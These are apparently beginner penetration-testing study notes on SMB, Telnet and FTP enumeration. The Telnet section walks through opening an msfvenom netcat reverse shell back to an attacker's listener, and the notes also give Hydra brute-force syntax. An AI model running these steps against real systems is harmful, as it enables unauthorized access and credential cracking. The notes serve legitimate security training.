## SMB
- SMB, Server Message Block Protocol, is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.
- Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network.
- Once clients have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.
- Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX.
- SMB runs on ports 139/tcp netbios-ssn and 445/tcp microsoft-ds
  
### Enumeration
- It is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.
- It can be used to gather usernames, passwords, network information, hostnames, application data, services, or any other information that may be valuable to an attacker.
- `enum4linux [options] ip` can be used to enumerate SMB shares on both Windows and Linux systems.
- After getting to know the share names on a server, We can remotely access the SMB share using the syntax: `smbclient //[IP]/[SHARE]` Followed by the tags: -U [name] : to specify the user -p [port] : to specify the port

## Telnet
- Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server.
- You can connect to a telnet server with the following syntax: `telnet [ip] [port]`
- Telnet has been replaced by SSH in most implementations in some applications due to the vulnerabilities discovered and that it sends messages in clear text.
> A "shell" is a command-line interface that allows users to interact with an operating system, execute commands, and manage files and processes. A "reverse shell" is a type of shell in which the target machine initiates a connection back to the attacker's machine, allowing the attacker to gain remote access and control over the target system. This is achieved by running a malicious payload on the target system, which establishes a network connection to a specified IP address and port controlled by the attacker. Once the connection is established, the attacker can execute commands and perform various actions on the compromised system as if they had physical access to it.
- After we get to know telnet port and that is open, we can try to execute commands on the target machine through a reverse shell:
  1. First we need to test if the local-target machines are able to reach eachother by starting a tcpdump listener on my local machine `sudo tcpdump ip proto \\icmp -i tun0` and pinging my machine from the telnet session `.RUN ping <my_machine_IP>`.
  2. Then we can generate a reverse shell payload using ***msfvenom***.This will generate and encode a netcat reverse shell for us. Here's the syntax: `msfvenom -p cmd/unix/reverse_netcat lhost=<local tun0 ip (our machine IP)> lport=<<listening port>> R`.
  3. In another terminal, we should start a netcat listener on our machine: `nc -lvp <listening port>`.
  4. Then we copy paste the payload generated by ***msfvenom*** to execute through the telnet session.
  5. By then, we can execute commands from our machine through netcat.

## FTP
- File Transfer Protocol (FTP) is a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this.
- FTP session operates using two channels: [1] a command (sometimes called the control) channel [2] a data channel.
- The FTP server may support either Active or Passive connections, or both.
  - In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it. 
  - In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it. 
- Once we know that FTP port is open, we can try connecting by `ftp <IP>`. sometimes we can login anonymously to ftp server, We can do this using by typing entering "anonymous" as username, and no password when prompted.

#### Hydra
Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more. Command syntax is as following: `hydra -t <Number of parallel connections per target> -l <username> -P <wordlist.txt file path> -vV <Target_IP> <service like ftp, smb, etc>`.

#### NMAP
- To look for open ports in the most common 1000 ports: `nmap ip`
- for all ports: `nmap -p- ip`, for range of ports `nmap -p x-y ip`
- `-sV`: Enables service version detection. It attempts to determine the version of the running services on the target.
- `-A`: Aggressive scan. It includes additional features like OS detection, script scanning, and traceroute.
